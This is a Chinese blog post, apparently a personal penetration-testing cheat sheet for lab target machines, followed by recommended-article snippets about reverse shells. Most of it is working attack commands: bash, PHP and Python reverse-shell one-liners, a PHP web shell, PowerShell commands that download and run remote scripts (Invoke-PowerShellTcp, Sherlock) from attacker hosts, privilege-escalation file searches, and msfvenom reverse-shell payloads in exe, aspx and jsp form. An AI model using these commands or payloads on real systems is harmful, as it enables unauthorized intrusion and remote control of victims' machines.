杂记-漏洞

最新推荐文章于 2025-03-06 12:16:32 发布
最新推荐文章于 2025-03-06 12:16:32 发布
阅读量165 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 靶机 文章标签: chrome 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/admin741admin/article/details/128467605

代码

python bash交互页面

python3 -c 'import pty; pty.spawn("/bin/bash")'

反弹代码

bash反弹shell

/bin/bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'

php bash反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.30/4444 0>&1'");?>

php 脚本反弹shell

php -r '$sock=fsockopen("10.xxx.xxx.xx",2333);exec("/bin/sh -i <&3 >&3 2>&3");'

python 脚本反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.xxx.xxx.xx",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

window文件

用dir命令查找文件

cmd

cd C:\ && dir user.txt /s /b

ps

Get-ChildItem -Path C:\ -Recurse  -Name *user.txt*

# powershell
# cmd.exe
# nc.exe
# temp
# public
# user.txt
# root.txt
命令说明
- /s是指列出当前目录包含子目录下的所有文件
- /b是仅列出文件名称,而日期、大小等其它信息则忽略

远程下载

  • 下载直接运行
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5/Sherlock.ps1'); Find-AllVulns"

powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.2/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.2 -port 4444

iex(new-object system.net.webclient).downloadstring("http://10.10.16.5/Sherlock.ps1")
  • 下载并保存
(new-object system.net.webclient).downloadfile("http://10.10.16.5/shell.exe","C:\Users\Public\shell.exe")

linux文件

grep 文件内容

grep -R -i root /home/* 2>/dev/null

find 搜索文件名

  • back
  • history
*back* *history*
find / -name "*back*" 2>/dev/null

find 用户组

find / -group user -type f 2>/dev/null

find 用户有s权限

find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f -user root 2>/dev/null

在这里插入图片描述

find root主,其他用户也用执行或者写入权限

  • 命令解释:从根目录下开始查找 文件类型 属主是root 普通用户或组可执行 其他用户可写 如果发现了符合条件的用 ls -l命令显示 错误信息从定向到null
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

开启服务器

在这里插入图片描述

路由

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

window-快捷键

services.msc

  • 服务

regedit

  • 注册表

ncpa.cpl

  • 网络适配器

字典

wfuzz

  • /usr/share/wfuzz/wordlist/general/common.txt
# 参数
sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12 http://192.168.56.14//index.php?FUZZ=something

# 目录
wfuzz -w wordlist/general/common.txt --sc 200,301 http://testphp.vulnweb.com/FUZZ

公共

  • /usr/share/wordlists/rockyou.txt

工具

impacket

export PATH=/usr/share/doc/python3-impacket/examples:$PATH

smbserver.py share . -smb2support
# 一定是\\和\
copy \\10.10.16.5\share\winPEAS.exe .

git

  • 代理
-c "http.proxy=10.0.2.1:10811"

ftp

  • 匿名
anonymous

木马

msf

  • 注意shell还是meterpreter
  • 注意是否x64还是默认32

ps1

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.5 LPORT=4545 --arch x64 --platform windows -f psh-reflection -o reverse.ps1

exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.2 LPORT=4445 -f exe -o shell.exe

aspx

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.2 LPORT=4444 -f aspx -o shell.aspx

jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.2 LPORT=443 -f raw -o shell.jsp
反弹shell以及常见的反弹Shell语句原理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-31 569
什么是反弹shell?原词为reverse shell,含义如下 控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。 其本质就是实现客户端与服务端的互换 反弹shell利用原因 初学时我们不禁有这样的疑问,为什么我们要用反弹shell呢?我们时候利用反弹shell呢?解释如下 为什么要用反弹shell 这里不以CTF举例,以相对更真实一点的渗透过程来举例,比如你作为攻击方,成功向目标处上传了木马文件,可以执行一些语句,我们想获取一个可以直接操作主机的虚拟终端,这个时
带你一步一步实战分析缓冲区溢出漏洞攻击
业精于勤,荒于嬉
03-12 524
题目1 (A)描述此二进制文件提供的服务,不需要运行二进制文件来找出这一点。 (B)有可能对此二进制文件进行缓冲区溢出攻击,它在哪里?哪些输入将触发它,并且攻击者可能会使用此溢出来做什么? 文件名:file1hds14 格式:x86 下载地址:IDA逆向分析缓冲区溢出攻击漏洞实例视频和文件.rar 其中包含2个英文教学视频(有文本字幕),还有视频中所用到的练习文件! 逆向分析1 文件功能逆向 用32位ida加载文件后,反编译main函数,如下 int __cdecl main(int argc, const
php反弹shell脚本
a1_pha的博客
01-24 1688
用msfvenom也可以生成反弹shell脚本,但有时候用不了。
反弹shell的命令大全
G3et的博客
03-21 1041
代码反弹shell的命令大全。
各种shell反弹方法
weixin_46626737的博客
05-16 3129
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
实战攻击-php反弹shell
网络安全领域优质创作者
11-05 4152
以下均为实际攻击过程,记录笔记,仅供学习参考 whatweb10.11.1.8:80cms识别 dirbhttp://10.11.1.8/ 目录扫描 dirbuster输入链接,选择线程,使用字典,选择字典,设置fuzz为dir/{dir}开始扫描 Python3 dirsearch.py -uurl-e php扫描目录 得到http://10.11.1.8/internal/ 目录,查看源码发现/internal/advanced_c...
关于在flask框架上进行web文件上传漏洞测试的杂记
qq_45071353的博客
11-25 1560
关于在flask框架上进行web文件上传漏洞测试的杂记简单说明简单测试 昨天不是刚把服务器给部署好了嘛,其中针对sql注入,xss以及文件上传做了一定程度的防范,可是不知道防护效果如何,今天就花了几个小时对文件上传做了些简单的测试。 简单说明 首先来说下我后端针对文件上传做的基本防护吧。 第一就是针对文件名进行处理,在后端进行文件后缀名截取,只允许png,jpg,jpeg格式的图片上传,对不满足条件的文件进行删除并在前端输出相关提示。当然这个工作其实在前端也可以做。 第二就是用python的imghdr.w
kkFileView-4.3.0命令执行复现(QVD-2024-14703)
qq_42704754的博客
07-19 869
准备好如下材料:说明:LibreOffice_7_rpm.tar.gz是LibreOffice_7.5.3.2_Linux_x86-64_rpm.tar.gz重命名得到的。将放到/tmp/然后进行访问,http://ip:8012,如下,搭建参考:https://blog.youkuaiyun.com/m0_71578648/article/details/139120468。
【与GPT对话】杂记
三少爷的甲壳虫
12-10 1461
【介绍】是FreeRTOS内核提供的接口,以便检测任务栈的使用情况,其可以检测某个任务当前的栈使用情况,返回其未使用栈空间的字节数,即当前任务栈的高水位线。它适用于任何基于FreeRTOS的系统,可应用于单片机、嵌入式系统等。【使用】在任务创建后,调用函数,传入任务句柄,可以得到任务栈的未使用空间大小,即栈的高水位线;如果未使用空间小于某个值,可以猜测任务栈溢出;若想在溢出时及时发现,可以增加一个定时器,每隔一段时间检测任务的栈使用情况,以防止系统异常。
linux系统安全杂记
keep_reading的博客
09-01 1135
文章目录07网络配置检查网络参数自定义规则08日志审计功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 07网络配置 检查网络参数 sysctl命令 -a 查看当前网络参数 net.ipv4.icmp_echo_ignore_br
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
反弹bash shell解释
-
03-15 805
反弹bash shell
Hackmyvm综合靶机 | Driftingblues-2
IerkeU的博客
04-06 2377
前言提要 今天在打靶机的时候遇见了一个新问题:Vulnhub靶机检测不到IP地址!!!!其原因也许是因为网卡服务启动失败。 所以这里也教一下大家当靶机探测不到IP地址的时候如何对靶机进行相关配置修改,也方便后续我再次遇见这种问题的时候知道如何操作 解决步骤 因为靶机我们是不知道账号密码的,所以只能通过拯救模式进行操作 在开机时按下Shift键进入界面,再按e键,进入以下界面 将ro 替换为 rw signie init=/bin/bash 同时按下Ctrl+X键,进入以下页面 查看当前网卡
【Vulnhub系列】Acid
大方子
11-28 1614
下载连接:https://download.vulnhub.com/acid/Acid.rar 靶机说明 Welcome to the world of Acid. Fairy tails uses secret keys to open the magical doors. 欢迎来到酸的世界。童话故事需要使用秘密钥匙打开魔法门。 目标 获得root权限和flag。 运行环境 ...
反弹shell的27种方法,都学会轻松让你搞定90%的渗透!黑客技术零基础入门到精通实战教程!
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
03-06 655
在渗透测试的实践中,反弹shell(Reverse Shell)是一项至关重要的技术,允许攻击者从远程位置获得对目标系统的交互式命令行访问权限。这一技术通过在被攻击系统上执行特定命令,将shell会话反向传输到攻击者控制的机器上,从而绕过防火墙等安全机制的限制。本文将详细探讨渗透测试中反弹shell的27种方法,但鉴于篇幅和实际操作的安全性考虑,将重点介绍部分高频使用的姿势,仅供参考。
反弹shell方式汇总
yj520400的博客
04-09 923
攻击机:目标机:或者保存为lltest_tcp.ps1文件WebClient).lltest_tcp.ps1 如下:function$clientSocketsTCPClient'[host]'[port]$stream$clientGetStream();
安全技术系列之反弹Shell
好记性不如烂笔头
03-13 2624
常用反弹shell技术汇总
常用的一句话反弹shell总结
热门推荐
橘子女侠
05-20 1万+
目录 常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机的反弹shell; 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取一句话反弹shell 常用的一句话反弹she...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值